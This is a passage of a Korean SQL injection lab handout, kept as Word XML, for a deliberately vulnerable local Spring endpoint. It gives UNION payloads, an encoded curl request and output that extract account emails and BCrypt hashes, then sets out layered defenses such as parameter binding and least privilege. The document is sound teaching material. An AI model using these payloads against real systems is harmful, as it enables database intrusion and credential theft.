        <w:t>→ 조건이 항상 참이 되어 모든 학생이 조회된다. 안전 엔드포인트에서는 검색어로만 취급되어 결과가 없다.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단계 3. 컬럼 수 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BB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name = %' UNION SELECT 1,2,3 #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>→ 1,2,3 한 행이 결과에 섞여 나오면 컬럼 수가 3으로 맞은 것이다.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단계 4. UNION 기반 계정 정보 탈취 (핵심)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BB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name = %' UNION SELECT id, email, password FROM user_info #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">→ 학생 목록 뒤에 user_info 테이블의 계정과 BCrypt 비밀번호 해시가 함께 조회된다 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>(admin@aa.com, user@aa.com).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단계 5. DB 메타정보 탈취 (교재 6장과 동일 기법)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>name = %' UNION SELECT table_schema, table_name, 3 FROM information_schema.tables #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name = %' UNION SELECT 1, column_name, 3 FROM information_schema.columns WHERE table_name='user_info' #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>→ 공격자가 테이블·컬럼 구조를 역추적하는 과정이다.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실습 함정 : 브라우저 주소창은 페이로드를 훼손한다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# 이후는 서버로 전송되지 않는다</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — # 는 URL 프래그먼트라 브라우저가 잘라낸다. 주석 종결자 # 가 사라져 UNION이 완성되지 않는다.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공백·% 처리가 브라우저마다 다르다</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 인코딩이 어긋나 구문이 깨진다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>→ 반드시 curl 또는 Postman으로 정확히 인코딩해서 요청한다. (# → %23, 공백 → %20, % → %25)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정상 동작하는 UNION 인젝션 (curl)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"http://localhost:8080/api/vuln/sqli/students?name=%25%27%20UNION%20SELECT%20id,email,password%20FROM%20user_info%20%23"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>실제 실행 결과(발췌) — 학생 8명 뒤에 계정/해시가 딸려 나온다.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[[1,"Alice Johnson","CS001"], ... ,[8,"Helen Lee","CS003"],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[1,"admin@aa.com","$2a$10$YySqg.UOCQzyErjyTPn4HO..."],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[2,"user@aa.com","$2a$10$MtsdPSwtZHOxiHLfM1YZPe..."]]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="180" w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t>단계 6. 안전 엔드포인트로 방어 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>같은 페이로드를 -safe 엔드포인트에 넣으면 결과가 [] (빈 배열)로, 인젝션이 무력화됨을 확인한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p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lastRenderedPageBreak/>
        <w:t>8. 방어 대책 정리</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection 방어는 한 가지 수단에 의존하지 않고 여러 겹으로 쌓는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>심층 방어(Defense in Depth)</w:t>
      </w:r>
      <w:r>
        <w:t>가 원칙이다. 가장 근본은 파라미터 바인딩이며, 나머지는 이를 보완하거나 피해를 줄이는 방어다. 아래는 현재 앱(Student_JWT)에 적용된 방어와, 일반적으로 적용해야 할 방어</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 대책을</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 함께 정리한 것이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t>8-1. 근본 대책 : 파라미터 바인딩 (가장 중요)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>쿼리의 구조(뼈대)는 코드로 고정하고, 사용자 입력은 자리</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>표시자에 "값"으로만 전달한다. 입력에 따옴표나 UNION이 들어와도 검색어로</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>만 취급되어 인젝션이 원천적으로 성립하지 않는다. 다른 모든 방어보다 우선한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">현재 앱 기준 : </w:t>
      </w:r>
      <w:r>
        <w:t>정상 검색 기능은 이미 안전하게 구현되어 있다.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JPA 메서드 쿼리</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — StudentRepository.findByNameContainingIgnoreCase(...) : 문자열 조립 자체가 없고 자동 바인딩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>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@Query 명명 파라미터</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — :name 자리에 값으로 바인딩된다.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동적 쿼리가 꼭 필요할 때</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JdbcTemplate은 ? , EntityManager 네이티브 쿼리는 setParameter 를 사용한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC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[안전] JPA 메서드 쿼리 (권장) - 문자열 조립이 없다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studentRepository.findByNameContainingIgnoreCase(name, pageable);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[안전] JdbcTemplate ? 바인딩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jdbcTemplate.queryForList(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"SELECT ... FROM students WHERE name LIKE ?", "%" + name + "%");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[안전] JPA 네이티브 :name 바인딩</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC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entityManager.createNativeQuery("... WHERE name LIKE :name")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC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.setParameter("name", "%" + name + "%");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t>8-2. 입력 검증 (화이트리스트)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>형식이 정해진 입력은 "허용된 형태만 통과"시키는 화이트리스트 방식으로 검증한다. 단, 검증은 우회될 수 있으므로 단독 방어로는 불충분하며 반드시 바인딩과 함께 쓴다(보조 수단).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>현재 앱 기준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학번은 정규식(^[A-Z]+\d+$) 형태로 확인한 뒤 학번/이름 검색을 분기한다.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요청 본문은 @Valid + DTO 제약(@NotBlank, @Size, @Email)으로 형식을 검증한다.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경로변수 {id}는 Long 타입으로 선언되어 숫자만 허용된다(타입 강제도 일종의 검증).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t>8-3. 최소 권한 원칙 (DB 계정)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>애플리케이션이 사용하는 DB 계정에는 꼭 필요한 권한만 부여한다. 인젝션이 성공하더라도 접근·피해 범위를 줄이는 "피해 최소화" 방어다.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lastRenderedPageBreak/>
        <w:t>앱 계정은 자신이 쓰는 스키마/테이블에만 접근하도록 제한한다.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DROP, GRANT, FILE, 관리 계정 권한 등은 앱 계정에서 제거한다.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information_schema 등 메타데이터 접근을 최소화하면 구조 탐색을 어렵게 만든다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">현재 앱 기준 : </w:t>
      </w:r>
      <w:r>
        <w:t>boot 계정이 boot_db 외 다른 DB에 접근하지 못하도록 권한을 좁히는 것이 권장된다(운영 환경).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t>8-4. 오류 메시지 숨김</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>상세한 SQL 오류 메시지나 스택트레이스가 응답에 노출되면, 공격자는 그 정보로 쿼리 구조를 알아내(오류 기반 인젝션) 공격을 정교화</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>한다. 사용자에게는 일반화된 오류만 보여준다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">현재 앱 기준 : </w:t>
      </w:r>
      <w:r>
        <w:t>@RestControllerAdvice(DefaultExceptionAdvice)가 예외를 표준 JSON 오류 응답으로 변환하여 원시 SQL 오류/스택트레이스가 그대로 노출되지 않는다. 운영 프로파일에서 상세 오류 노출을 끄는 것도 함께 적용한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t>8-5. 추가 방어 대책 (일반</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t>적인</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t xml:space="preserve"> 대책)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>아래는 특정 앱에 국한되지 않고, SQL Injection 전반에 적용할 수 있는 방어</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 대책</w:t>
      </w:r>
      <w:r>
        <w:t>들</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>입니</w:t>
      </w:r>
      <w:r>
        <w:t>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ORM/영속성 프레임워크 활용</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JPA/Hibernate 등은 기본이 파라미터 바인딩이라 인젝션 위험이 크게 줄어든다</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (단, 네이티브 쿼리 문자열 결합은 예외).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저장 프로시저(Stored Procedure)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 파라미터를 바인딩하는 형태로 작성할 경우 안전. 내부에서 동적 SQL을 문자열 결합하면 다시 취약</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>해진다.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WAF / IDS·IPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 웹 방화벽/침입탐지로 UNION, OR 1=1 같은 공격 패턴을 탐지·차단한다. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923028" w:rsidRPr="00A77009" w:rsidRDefault="00A77009">
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1140"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">※ </w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>약어</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> — WAF: Web Application Firewall(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>애플리케이션</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>방화벽</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>), IDS: Intrusion Detection System(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>침입</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>탐지</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>시스템</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>), IPS: Intrusion Prevention System(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>침입</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>방지</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>시스템</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002854A7" w:rsidRPr="00A77009" w:rsidRDefault="00AB3738">
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1140"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">※ 보충 — WAF(웹 방화벽)는 HTTP 요청을 검사하는 웹 전용 검문소, IDS는 공격을 탐지·경보만 하는 CCTV, IPS는 탐지 후 차단까지 하는 경비원에 해당한다. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002854A7" w:rsidRDefault="00AB3738">
      <w:pPr>
        <w:spacing w:after="80" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1140"/>
      </w:pPr>
      <w:r w:rsidRPr="00A77009">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>다만 이들은 공격 패턴을 걸러내는 보조 방어일 뿐, 인코딩·변형(예: UN/**/ION 처럼 쪼개기)으로 우회될 수 있어 근본 방어인 파라미터 바인딩(8-1)을 대체하지 못한다.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민감정보 암호화 저장</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 비밀번호는 BCrypt 등으로 해시 저장하여, 설령 탈취되어도 즉시 악용을 어렵게 한다. (현재 앱은 BCrypt 적용됨)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최신 보안 패치</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — DB 엔진, JDBC 드라이버, 프레임워크를 최신으로 유지한다.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로깅·모니터링</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 비정상 쿼리·대량 조회·반복 오류를 탐지해 공격 시도를 조기에 인지한다.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이스케이프(Escaping)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 특수문자를 수동으로 처리하는 방식. 누락·우회가 쉬워 최후 수단이며, 바인딩을 대체하지 못한다(권장하지 않음).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77009" w:rsidRDefault="00A77009">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8-6. 방어 대책 요약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00"/>
        <w:gridCol w:w="3500"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D355A">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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계층</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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대책</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>현재 앱 적용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1순위(근본)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파라미터 바인딩 / ORM 메서드 쿼리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[적용] JPA 메서드·@Query (취약 데모만 예외)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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2순위(보조)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입력 검증(화이트리스트), 타입 강제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[적용] @Valid DTO, PathVariable Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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3순위(피해축소)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DB 계정 최소 권한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B26A00"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>[권장] boot 계정 권한 축소</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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3순위(피해축소)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오류 메시지 숨김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[적용] @RestControllerAdvice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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3순위(피해축소)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민감정보 암호화(비밀번호)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2E7D32"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>[적용] BCrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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심화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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>WAF/IDS, 패치, 로깅·모니터링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D355A" w:rsidRDefault="00351BBC">
            <w:r>
              <w:rPr>
                <w:color w:val="B26A00"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>[권장] 교재 18장 Snort 연계</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t>9. 핵심 요약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 xml:space="preserve">SQL Injection의 본질은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>입력을 데이터가 아닌 SQL 구문으로 취급</w:t>
      </w:r>
      <w:r>
        <w:t>하는 것이다.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 xml:space="preserve">취약/안전을 가르는 것은 도구가 아니라 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>문자열 결합 vs 파라미터 바인딩</w:t>
      </w:r>
      <w:r>
        <w:t>이다. JPA도 결합하면 뚫린다.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UNION 인젝션으로 다른 테이블(user_info)의 계정·비밀번호 해시까지 탈취될 수 있다.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근본 방어는 파라미터 바인딩이며, 최소 권한·오류 숨김을 함께 적용한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>공격 실습은 반드시 격리된 교육용 환경에서만 수행한다.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001D355A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42C6F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9438C268"/>
    <w:lvl w:ilvl="0" w:tplc="BEB8317C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C276A678" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C3E0D98A" w:tentative="1">
